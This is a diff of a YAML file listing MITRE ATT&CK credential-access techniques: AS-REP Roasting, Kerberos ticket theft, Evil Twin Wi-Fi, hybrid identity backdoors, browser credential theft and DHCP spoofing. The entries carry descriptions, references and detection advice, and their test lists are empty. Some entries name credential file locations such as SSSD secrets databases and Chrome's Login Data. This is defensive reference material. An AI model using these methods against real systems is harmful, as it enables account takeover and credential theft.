+      id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+      created: '2024-09-17T15:02:31.324Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1558.004
-        url: https://attack.mitre.org/techniques/T1558/004
-      - source_name: Harmj0y Roasting AS-REPs Jan 2017
-        url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
-        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
-          24, 2020.
-      - source_name: Microsoft Kerberos Preauth 2014
-        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
-        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
-          It Should Not Be Disabled. Retrieved August 25, 2020.'
-      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
-        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
-        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
-          with AS-REP Roasting. Retrieved August 24, 2020.
-      - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        source_name: SANS Attacking Kerberos Nov 2014
-        url: https://redsiege.com/kerberoast-slides
-      - url: https://adsecurity.org/?p=2293
-        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
-          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
-          Domain. Retrieved March 22, 2018.
-        source_name: AdSecurity Cracking Kerberos Dec 2015
-      - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        source_name: Microsoft Detecting Kerberoasting Feb 2018
-      - source_name: Microsoft 4768 TGT 2017
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
-        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
-          ticket (TGT) was requested. Retrieved August 24, 2020.'
-      modified: '2021-06-07T19:23:33.039Z'
+        url: https://attack.mitre.org/techniques/T1558/005
+        external_id: T1558.005
+      - source_name: Binary Defense Kerberos Linux
+        description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+          October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+          APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+        url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+      - source_name: Kerberos GNU/Linux
+        description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+          Compendium (GNU/Linux). Retrieved September 17, 2024.
+        url: https://adepts.of0x.cc/kerberos-thievery-linux/
+      - source_name: Kekeo
+        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+        url: https://github.com/gentilkiwi/kekeo
+      - source_name: SpectorOps Bifrost Kerberos macOS 2019
+        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+          Retrieved October 6, 2021.
+        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+      - source_name: Brining MimiKatz to Unix
+        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+          Mimikatz et al to UNIX. Retrieved October 13, 2021.
+        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+      - source_name: Linux Kerberos Tickets
+        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+          Teams. Retrieved October 4, 2021.
+        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1558.004:
+    technique:
+      modified: '2024-10-15T15:32:07.850Z'
       name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
       description: "Adversaries may reveal credentials of accounts that have disabled
         Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
@@ -44772,6 +45445,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Yossi Nisani, Cymptom
+      - James Dunn, @jamdunnDFW, EY
+      - Swapnil Kumbhar
+      - Jacques Pluviose, @Jacqueswildy_IT
+      - Dan Nutting, @KerberToast
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -44779,32 +45459,68 @@ credential-access:
         pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
         Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
         Microsoft 4768 TGT 2017)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Credential Request'
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Valid domain account
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      created: '2020-08-24T13:43:00.028Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1558/004
+        external_id: T1558.004
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+      - source_name: Harmj0y Roasting AS-REPs Jan 2017
+        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+          23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+          with AS-REP Roasting. Retrieved August 24, 2020.
+        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
+      - source_name: AdSecurity Cracking Kerberos Dec 2015
+        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+          Domain. Retrieved March 22, 2018.
+        url: https://adsecurity.org/?p=2293
+      - source_name: Microsoft 4768 TGT 2017
+        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+          ticket (TGT) was requested. Retrieved August 24, 2020.'
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+      - source_name: Microsoft Kerberos Preauth 2014
+        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+          It Should Not Be Disabled. Retrieved August 25, 2020.'
+        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.004
     atomic_tests: []
   T1558:
     technique:
-      modified: '2024-03-01T16:58:02.395Z'
+      modified: '2024-09-17T19:49:11.455Z'
       name: Steal or Forge Kerberos Tickets
       description: |
         Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
 
         On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
-        Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
-        Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
@@ -44840,7 +45556,7 @@ credential-access:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Logon Session: Logon Session Metadata'
@@ -44865,13 +45581,6 @@ credential-access:
         description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
           using Azure Security Center. Retrieved March 23, 2018.
         url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Kekeo
-        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
-        url: https://github.com/gentilkiwi/kekeo
-      - source_name: SpectorOps Bifrost Kerberos macOS 2019
-        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
-          Retrieved October 6, 2021.
-        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
       - source_name: Medium Detecting Attempts to Steal Passwords from Memory
         description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
           from Memory. Retrieved October 11, 2019.
@@ -44880,14 +45589,6 @@ credential-access:
         description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
           Attacks. Retrieved February 27, 2020.
         url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
-      - source_name: macOS kerberos framework MIT
-        description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
-          for Macintosh Preferences Documentation. Retrieved October 6, 2021.
-        url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
-      - source_name: MIT ccache
-        description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
-          Documentation: Credential Cache. Retrieved October 4, 2021.'
-        url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -44909,23 +45610,14 @@ credential-access:
         description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
           Secret Decoder Ring. Retrieved February 27, 2020.
         url: https://adsecurity.org/?p=227
-      - source_name: Brining MimiKatz to Unix
-        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
-          Mimikatz et al to UNIX. Retrieved October 13, 2021.
-        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
-      - source_name: Linux Kerberos Tickets
-        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
-          Teams. Retrieved October 4, 2021.
-        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555:
     technique:
-      modified: '2024-02-26T14:19:09.417Z'
+      modified: '2024-10-15T14:57:46.850Z'
       name: Credentials from Password Stores
       description: 'Adversaries may search for common password storage locations to
         obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -44976,12 +45668,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555
     atomic_tests: []
   T1552:
     technique:
-      modified: '2024-04-15T21:33:12.892Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Unsecured Credentials
       description: 'Adversaries may search compromised systems to find and obtain
         insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -44993,6 +45684,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Austin Clark, @c2defense
       x_mitre_deprecated: false
@@ -45007,18 +45699,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Application Log: Application Log Content'
@@ -45041,37 +45733,115 @@ credential-access:
         url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1552
+    atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      identifier: T1552
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -45079,9 +45849,9 @@ credential-access:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -45090,21 +45860,22 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -45144,55 +45915,10 @@ credential-access:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ryan Benson, Exabeam
-      - Barry Shteiman, Exabeam
-      - Sylvain Gil, Exabeam
-      - RedHuntLabs, @redhuntlabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
-      type: attack-pattern
-      created: '2020-02-12T18:57:36.041Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.003
-        url: https://attack.mitre.org/techniques/T1555/003
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Microsoft CryptUnprotectData April 2018
-        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
-        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
-          June 18, 2019.
-      - source_name: Proofpoint Vega Credential Stealer May 2018
-        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
-        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
-          in targeted campaign . Retrieved June 18, 2019.
-      - source_name: FireEye HawkEye Malware July 2017
-        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
-        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
-          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
-          2019.
-      - source_name: GitHub Mimikittenz July 2016
-        url: https://github.com/putterpanda/mimikittenz
-        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
-          Retrieved June 20, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-15T14:13:45.294Z'
       name: 'Credentials from Password Stores: Credentials from Web Browsers'
       description: "Adversaries may acquire credentials from web browsers by reading
         files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -45222,6 +45948,12 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ryan Benson, Exabeam
+      - Barry Shteiman, Exabeam
+      - Sylvain Gil, Exabeam
+      - RedHuntLabs, @redhuntlabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Identify web browser files that contain credentials such
         as Google Chrome’s Login Data database file: <code>AppData\Local\Google\Chrome\User
         Data\Default\Login Data</code>. Monitor file read events of web browser files
@@ -45231,23 +45963,58 @@ credential-access:
         reading web browser process memory, utilizing regular expressions, and those
         that contain numerous keywords for common web applications (Gmail, Twitter,
         Office365, etc.).'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Access'
       - 'File: File Access'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+      created: '2020-02-12T18:57:36.041Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/003
+        external_id: T1555.003
+      - source_name: GitHub Mimikittenz July 2016
+        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+          Retrieved June 20, 2019.
+        url: https://github.com/putterpanda/mimikittenz
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Microsoft CryptUnprotectData April 2018
+        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+          June 18, 2019.
+        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+      - source_name: Proofpoint Vega Credential Stealer May 2018
+        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+          in targeted campaign . Retrieved June 18, 2019.
+        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+      - source_name: FireEye HawkEye Malware July 2017
+        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+          2019.
+        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1555.003
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -45284,23 +46051,23 @@ credential-access:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
